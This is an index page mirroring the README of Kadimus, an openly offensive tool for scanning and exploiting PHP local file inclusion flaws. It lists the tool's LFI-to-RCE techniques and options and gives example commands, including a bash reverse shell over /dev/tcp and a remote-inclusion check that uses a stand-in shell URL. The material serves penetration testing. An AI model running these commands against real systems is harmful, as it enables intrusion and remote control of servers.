Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/P0cL4bs/Kadimus
kadimus is a tool to check and exploit lfi vulnerability.
https://github.com/P0cL4bs/Kadimus
Last synced: 2 months ago
JSON representation
kadimus is a tool to check and exploit lfi vulnerability.
- Host: GitHub
- URL: https://github.com/P0cL4bs/Kadimus
- Owner: P0cL4bs
- License: mit
- Archived: true
- Created: 2015-06-26T23:20:53.000Z (almost 9 years ago)
- Default Branch: master
- Last Pushed: 2020-08-17T12:01:23.000Z (almost 4 years ago)
- Last Synced: 2024-01-25T19:07:23.609Z (5 months ago)
- Language: C
- Homepage:
- Size: 239 KB
- Stars: 503
- Watchers: 31
- Forks: 137
- Open Issues: 7
-
Metadata Files:
- Readme: README.md
- License: license.txt
Lists
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- awesome-pentest-resource - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- awesome-penetest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Tools / Web Exploitation)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Penetration Testing Report Templates)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Tools / Web Exploitation)
- awesome-pentest-listas - Kadimus - LFI scan and exploit tool. (Tools / Web Exploitation)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Tools / Web Exploitation)
- paralax-awesome-pentest - Kadimus - LFI scan and exploit tool. (Tools / Web Exploitation)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Tools / Web Exploitation)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Penetration Testing Report Templates)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- fucking-awesome-pentest - Kadimus - LFI scan and exploit tool. (Web Exploitation / Web file inclusion tools)
- venom - `Kadimus` - LFI scan and exploit tool. (Web / Web File Inclusion Tools)
README
[](https://inventory.rawsec.ml/tools.html#Kadimus)
[](https://github.com/P0cL4bs/Kadimus/stargazers)
[](https://github.com/P0cL4bs/Kadimus/blob/master/license.txt)
# kadimus
LFI Scan & Exploit Tool
--
kadimus is a tool to check for and exploit LFI vulnerabilities, with a focus on PHP systems.
Features:
- [x] Check all url parameters
- [x] /var/log/auth.log RCE
- [x] /proc/self/environ RCE
- [x] php://input RCE
- [x] data://text RCE
- [x] expect://cmd RCE
- [x] Source code disclosure
- [x] Command shell interface through HTTP request
- [x] Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
- [x] Proxy socks5 support for remote connections
## Compile:
First, make sure you have all dependencies installed in your system: `libcurl`, `libopenssl`, `libpcre` and `libssh`.
Then you can clone the repository, to get the source code:
```sh
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus
```
### And finally:
```sh
$ make
```
## Options:
```
Options:
-h, --help Display this help menu
Request:
-B, --cookie STRING Set custom HTTP cookie header
-A, --user-agent STRING User-Agent to send to server
--connect-timeout SECONDS Maximum time allowed for connection
--retry NUMBER Number of times to retry if connection fails
--proxy STRING Proxy to connect (syntax: protocol://hostname:port)
Scanner:
-u, --url STRING URL to scan/exploit
-o, --output FILE File to save output results
Explotation:
--parameter STRING Parameter name to inject exploit
(only needed by RCE data and source disclosure)
RCE:
-T, --technique=TECH LFI to RCE technique to use
-C, --code STRING Custom PHP code to execute, with php brackets
-c, --cmd STRING Execute system command on vulnerable target system
-s, --shell Simple command shell interface through HTTP request
--connect STRING IP/hostname to connect to
-p, --port NUMBER Port number to connect to or listen on
-l, --listen Bind and listen for incoming connections
--ssh-port NUMBER Set the SSH port to try command injection (default: 22)
--ssh-target STRING Set the SSH host
RCE Available techniques
environ Try to run PHP code using /proc/self/environ
input Try to run PHP code using php://input
auth Try to run PHP code using /var/log/auth.log
data Try to run PHP code using data://text
expect Try to run a command using expect://cmd
Source Disclosure:
-S, --source Try to get the source file using filter://
-f, --filename STRING Set filename to grab source [REQUIRED]
-O FILE Set output file (default: stdout)
```
## Examples:
### Scanning:
```
./kadimus -u localhost/?pg=contact -A my_user_agent
```
### Get source code of file:
```
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
```
### Execute php code:
```
./kadimus -u localhost/?pg=php://input%00 -C '' -T input
```
### Execute command:
```
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
```
### Checking for RFI:
You can also check for RFI errors -- just put the remote URL in resource/common_files.txt
and the regex to identify them, example:
```php
/* http://bad-url.com/shell.txt */
```
in file:
```
http://bad-url.com/shell.txt?:scorpion say get over here
```
### Reverse shell:
```
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
```
Contributing
------------
You can help with code, or by donating.
If you want to help with code, use the kernel code style as a reference.
Paypal: [](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=RAG26EKAYHQSY¤cy_code=BRL&source=url)
BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq